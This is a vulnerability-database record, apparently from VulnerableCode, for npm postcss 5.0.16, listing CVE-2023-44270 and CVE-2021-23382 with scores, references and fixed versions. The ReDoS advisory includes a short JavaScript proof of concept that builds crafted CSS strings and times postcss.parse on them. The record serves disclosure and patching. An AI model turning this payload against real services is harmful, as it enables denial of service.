Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:npm/postcss@5.0.16
Typenpm
Namespace
Namepostcss
Version5.0.16
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version8.4.31
Latest_non_vulnerable_version8.4.31
Affected_by_vulnerabilities
0
url VCID-f8u5-8mj5-7yc6
vulnerability_id VCID-f8u5-8mj5-7yc6
summary 
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\r` discrepancies, as demonstrated by `@font-face{ font:(\r/*);}` in a rule.

This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-44270.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-44270.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-44270
reference_id
reference_type
scores
0
value 0.00197
scoring_system epss
scoring_elements 0.41638
published_at 2026-04-21T12:55:00Z
1
value 0.00197
scoring_system epss
scoring_elements 0.41713
published_at 2026-04-18T12:55:00Z
2
value 0.00197
scoring_system epss
scoring_elements 0.41691
published_at 2026-04-13T12:55:00Z
3
value 0.00197
scoring_system epss
scoring_elements 0.41706
published_at 2026-04-12T12:55:00Z
4
value 0.00197
scoring_system epss
scoring_elements 0.41739
published_at 2026-04-16T12:55:00Z
5
value 0.00197
scoring_system epss
scoring_elements 0.41716
published_at 2026-04-09T12:55:00Z
6
value 0.00197
scoring_system epss
scoring_elements 0.41707
published_at 2026-04-08T12:55:00Z
7
value 0.00197
scoring_system epss
scoring_elements 0.41657
published_at 2026-04-07T12:55:00Z
8
value 0.00197
scoring_system epss
scoring_elements 0.41729
published_at 2026-04-04T12:55:00Z
9
value 0.00197
scoring_system epss
scoring_elements 0.41701
published_at 2026-04-02T12:55:00Z
10
value 0.00219
scoring_system epss
scoring_elements 0.44445
published_at 2026-04-24T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-44270
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44270
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44270
3
reference_url https://github.com/github/advisory-database/issues/2820
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-23T16:38:23Z/
url https://github.com/github/advisory-database/issues/2820
4
reference_url https://github.com/postcss/postcss
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss
5
reference_url https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-23T16:38:23Z/
url https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25
6
reference_url https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-23T16:38:23Z/
url https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5
7
reference_url https://github.com/postcss/postcss/releases/tag/8.4.31
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-23T16:38:23Z/
url https://github.com/postcss/postcss/releases/tag/8.4.31
8
reference_url https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html
9
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1053282
reference_id 1053282
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1053282
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2326998
reference_id 2326998
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2326998
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-44270
reference_id CVE-2023-44270
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-44270
12
reference_url https://github.com/advisories/GHSA-7fh5-64p2-3v2j
reference_id GHSA-7fh5-64p2-3v2j
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7fh5-64p2-3v2j
13
reference_url https://access.redhat.com/errata/RHSA-2024:10517
reference_id RHSA-2024:10517
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:10517
14
reference_url https://access.redhat.com/errata/RHSA-2024:10908
reference_id RHSA-2024:10908
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:10908
15
reference_url https://access.redhat.com/errata/RHSA-2025:0654
reference_id RHSA-2025:0654
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0654
16
reference_url https://access.redhat.com/errata/RHSA-2025:0892
reference_id RHSA-2025:0892
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0892
17
reference_url https://access.redhat.com/errata/RHSA-2025:1824
reference_id RHSA-2025:1824
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1824
18
reference_url https://access.redhat.com/errata/RHSA-2025:1829
reference_id RHSA-2025:1829
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1829
19
reference_url https://access.redhat.com/errata/RHSA-2025:1865
reference_id RHSA-2025:1865
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1865
20
reference_url https://access.redhat.com/errata/RHSA-2025:1866
reference_id RHSA-2025:1866
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1866
21
reference_url https://access.redhat.com/errata/RHSA-2025:2652
reference_id RHSA-2025:2652
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:2652
22
reference_url https://access.redhat.com/errata/RHSA-2025:3069
reference_id RHSA-2025:3069
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:3069
fixed_packages
0
url pkg:npm/postcss@8.4.31
purl pkg:npm/postcss@8.4.31
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/postcss@8.4.31
aliases CVE-2023-44270, GHSA-7fh5-64p2-3v2j
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f8u5-8mj5-7yc6
1
url VCID-scy5-ccf9-dygp
vulnerability_id VCID-scy5-ccf9-dygp
summary 
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern 
```regex
\/\*\s* sourceMappingURL=(.*)
```

### PoC
```js
var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}
```
```js
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23382.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23382.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-23382
reference_id
reference_type
scores
0
value 0.00071
scoring_system epss
scoring_elements 0.21483
published_at 2026-04-24T12:55:00Z
1
value 0.00071
scoring_system epss
scoring_elements 0.21803
published_at 2026-04-02T12:55:00Z
2
value 0.00071
scoring_system epss
scoring_elements 0.21856
published_at 2026-04-04T12:55:00Z
3
value 0.00071
scoring_system epss
scoring_elements 0.2161
published_at 2026-04-07T12:55:00Z
4
value 0.00071
scoring_system epss
scoring_elements 0.21686
published_at 2026-04-08T12:55:00Z
5
value 0.00071
scoring_system epss
scoring_elements 0.21743
published_at 2026-04-09T12:55:00Z
6
value 0.00071
scoring_system epss
scoring_elements 0.21754
published_at 2026-04-11T12:55:00Z
7
value 0.00071
scoring_system epss
scoring_elements 0.21714
published_at 2026-04-12T12:55:00Z
8
value 0.00071
scoring_system epss
scoring_elements 0.21658
published_at 2026-04-13T12:55:00Z
9
value 0.00071
scoring_system epss
scoring_elements 0.21656
published_at 2026-04-16T12:55:00Z
10
value 0.00071
scoring_system epss
scoring_elements 0.21663
published_at 2026-04-18T12:55:00Z
11
value 0.00071
scoring_system epss
scoring_elements 0.21631
published_at 2026-04-21T12:55:00Z
12
value 0.00071
scoring_system epss
scoring_elements 0.21632
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-23382
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23382
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23382
3
reference_url https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
4
reference_url https://github.com/postcss/postcss/releases/tag/7.0.36
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/releases/tag/7.0.36
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-23382
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-23382
6
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
7
reference_url https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1954150
reference_id 1954150
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1954150
9
reference_url https://github.com/advisories/GHSA-566m-qj78-rww5
reference_id GHSA-566m-qj78-rww5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-566m-qj78-rww5
10
reference_url https://access.redhat.com/errata/RHSA-2021:2438
reference_id RHSA-2021:2438
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2438
11
reference_url https://access.redhat.com/errata/RHSA-2021:3917
reference_id RHSA-2021:3917
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3917
fixed_packages
0
url pkg:npm/postcss@7.0.36
purl pkg:npm/postcss@7.0.36
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-f8u5-8mj5-7yc6
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/postcss@7.0.36
1
url pkg:npm/postcss@8.2.13
purl pkg:npm/postcss@8.2.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-f8u5-8mj5-7yc6
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/postcss@8.2.13
aliases CVE-2021-23382, GHSA-566m-qj78-rww5
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-scy5-ccf9-dygp
Fixing_vulnerabilities
Risk_score3.1
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/postcss@5.0.16